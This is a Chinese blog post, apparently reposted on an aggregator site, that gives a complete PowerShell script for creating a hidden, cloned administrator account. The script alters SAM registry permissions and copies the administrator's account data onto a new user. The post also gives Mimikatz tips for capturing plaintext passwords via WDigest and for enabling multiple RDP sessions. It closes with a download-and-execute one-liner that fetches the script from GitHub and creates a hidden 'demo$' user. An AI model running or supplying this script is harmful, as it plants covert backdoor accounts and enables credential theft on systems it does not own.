隐藏用户建立（Powershell）

Posted 2021-01-17 err0">tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了隐藏用户建立（Powershell）相关的知识，希望对你有一定的参考价值。

最近做测试的时候发现，windows server2012 使用Mimikatz是直接抓不到明文密码的，而且，直接创建的账号登陆有时会碰到这个问题：

ps：2012抓明文需要HKLM:SYSTEMCurrentControlSetControlSecurityProvidersWDigest的"UseLogonCredential"设置为1，类型为DWORD 32才可以，然后下次用户再登录，才能记录到明文密码。

后来发现以前的建立克隆账号的方式是可以使得新建的账号登陆系统的，为了方便，整理了一个powershell脚本，脚本可以自动修改注册表键值权限（需要用administrator权限运行，即bypassuac以后的权限），之后在进行操作。具体代码如下：

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

function Create-Clone

{

<#

.SYNOPSIS

This script requires Administrator privileges. use Invoke-TokenManipulation.ps1 to get system privileges and create the clone user.

.PARAMETER u

The clone username

.PARAMETER p

The clone user‘s password

.PARAMETER cu

The user to clone, default administrator

.EXAMPLE

Create-Clone -u evi1cg -p evi1cg123 -cu administrator

#>

    Param(

        [Parameter(Mandatory=$true)]

        [String]

        $u,



        [Parameter(Mandatory=$true)]

        [String]

        $p,



        [Parameter(Mandatory=$false)]

        [String]

        $cu = "administrator"

    )

    function upReg{

        "HKEY_LOCAL_MACHINESAM [1 17]" | Out-File $env:tempup.ini

        "HKEY_LOCAL_MACHINESAMSAM [1 17]"| Out-File -Append $env:tempup.ini

        "HKEY_LOCAL_MACHINESAMSAMDomains [1 17]" | Out-File -Append $env:tempup.ini

        "HKEY_LOCAL_MACHINESAMSAMDomainsAccount [1 17] "| Out-File -Append $env:tempup.ini

        "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers [1 17] "| Out-File -Append $env:tempup.ini

        "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames [1 17]"| Out-File -Append $env:tempup.ini

        cmd /c "regini $env:tempup.ini"

        Remove-Item $env:tempup.ini



    }

    function downreg {

        "HKEY_LOCAL_MACHINESAM [1 17]" | Out-File $env:tempdown.ini

        "HKEY_LOCAL_MACHINESAMSAM [17]"| Out-File -Append $env:tempdown.ini

        "HKEY_LOCAL_MACHINESAMSAMDomains [17]" | Out-File -Append $env:tempdown.ini

        "HKEY_LOCAL_MACHINESAMSAMDomainsAccount [17] "| Out-File -Append $env:tempdown.ini

        "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers [17] "| Out-File -Append $env:tempdown.ini

        "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames [17]"| Out-File -Append $env:tempdown.ini

        cmd /c "regini $env:tempdown.ini"

        Remove-Item $env:tempdown.ini

    }

    function Create-user ([string]$Username,[string]$Password) {

        $group = "Administrators"

        $existing = Test-Path -path "HKLM:SAMSAMDomainsAccountUsersNames$Username"

        if (!$existing) {

            Write-Host "[*] Creating new local user $Username with password $Password"

            & NET USER $Username $Password /add /y /expires:never | Out-Null

            Write-Host "[*] Adding local user $Username to $group."

            & NET LOCALGROUP $group $Username /add | Out-Null



        }

        else {

            Write-Host "[*] Adding existing user $Username to $group."

            & NET LOCALGROUP $group $Username /add | Out-Null

            $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"

            $exist = $adsi.Children | where {$_.SchemaClassName -eq ‘user‘ -and $_.Name -eq $Username }

            Write-Host "[*] Setting password for existing local user $Username"

            $exist.SetPassword($Password)

        }



        Write-Host "[*] Ensuring password for $Username never expires."

        & WMIC USERACCOUNT WHERE "Name=‘$Username‘" SET PasswordExpires=FALSE   | Out-Null

    }

    function GetUser-Key([string]$user)

    {

        cmd /c " echo HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames$user [1 17] >> $env:temp$user.ini"

        cmd /c "regini $env:temp$user.ini"

        Remove-Item $env:temp$user.ini

        if(Test-Path -Path "HKLM:SAMSAMDomainsAccountUsersNames$user"){

            cmd /c "regedit /e $env:temp$user.reg "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNames$user""

            $file = Get-Content "$env:temp$user.reg" | Out-String

            $pattern="@=hex((.*?)):"

            $file -match $pattern |Out-Null

            $key = "00000"+$matches[1]

            Write-Host "[!]"$key

            return $key

        }else {

            Write-Host "[-] SomeThing Wrong !"

        }



    }

    function Clone ([string]$ukey,[string]$cukey) {

        "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers$ukey [1 17] "| Out-File $env:tempf.ini

        "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers$cukey [1 17] " | Out-File $env:tempf.ini

        cmd /c " regini $env:tempf.ini"

        Remove-Item $env:tempf.ini

        $ureg = "HKLM:SAMSAMDomainsAccountUsers$ukey" |Out-String

        $cureg = "HKLM:SAMSAMDomainsAccountUsers$cukey" |Out-String

        Write-Host "[*] Get clone user‘F value"

        $cuFreg = Get-Item -Path $cureg.Trim()

        $cuFvalue = $cuFreg.GetValue(‘F‘)

        Write-Host "[*] Change user‘F value"

        Set-ItemProperty -path $ureg.Trim() -Name "F" -value $cuFvalue

        $outreg = "HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers$ukey"

        cmd /c "regedit /e $env:tempout.reg $outreg.Trim()"

    }

    function Main () {

        if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))

        {

            Write-Output "Script must be run as administrator"

            break

        }

        Write-Output "[*] Start"

        Write-Output "[*] Tring to change reg privilege !"

        upReg

        if( !(Test-Path -path "HKLM:SAMSAMDomainsAccountUsersNames$cu")){

            Write-Host "[-] The User to Clone does not exist !"

            Write-Output "[*] Change reg privilege back !"

            downReg

            Write-Output "[*] Exiting !"

        }

        else {

            if(!(Test-Path -path "HKLM:SAMSAMDomainsAccountUsersNames$u")){

                $tmp = "1"

            }

            else{

                $tmp = "0"

            }

            Write-Output "[*] Create User..."

            Create-user $u $p

            Write-Output "[*] Get User $u‘s Key .."

            $ukey = GetUser-Key $u |Out-String

            Write-Output "[*] Get User $cu‘s Key .."

            $cukey = GetUser-Key $cu |Out-String

            Write-Output "[*] Clone User.."

            Clone $ukey $cukey

            if($tmp -eq 1 ){

                Write-Output "[*] Delete User.."

                cmd /c "net User $u /del " |Out-Null

            }else{ Write-Output "[*] Don‘t need to delete.."}

            cmd /c "regedit /s $env:temp$u.reg"

            cmd /c "regedit /s $env:tempout.reg"

            Remove-Item $env:temp*.reg

            Write-Output "[*] Change reg privilege back !"

            downreg

            Write-Output "[*] Done"

        }

    }

    Main

}

GITHUB：

新建账号以后，可成功登陆系统

在Win7上做的测试如下：

demo

当然可以配合这个姿势来实现多用户登陆。

使用mimikatz.exe,执行ts::multirdp允许多用户远程登录

ps:该方法在系统重启后失效，下次使用需要重新执行命令ts::multirdp,也可通过修改文件termsrv.dll实现永久修改

最后是远程执行的方式：

1

powershell IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Create-Clone.ps1‘); Create-Clone -u demo$ -p test123

以上是关于隐藏用户建立（Powershell）的主要内容，如果未能解决你的问题，请参考以下文章

windows创建隐藏用户的powershell脚本

片段隐藏在Android中不起作用

在片段替换上显示/隐藏 Android 软键盘

隐藏/显示片段中的导航元素

Sphinx、reStructuredText 显示/隐藏代码片段

在android中显示隐藏片段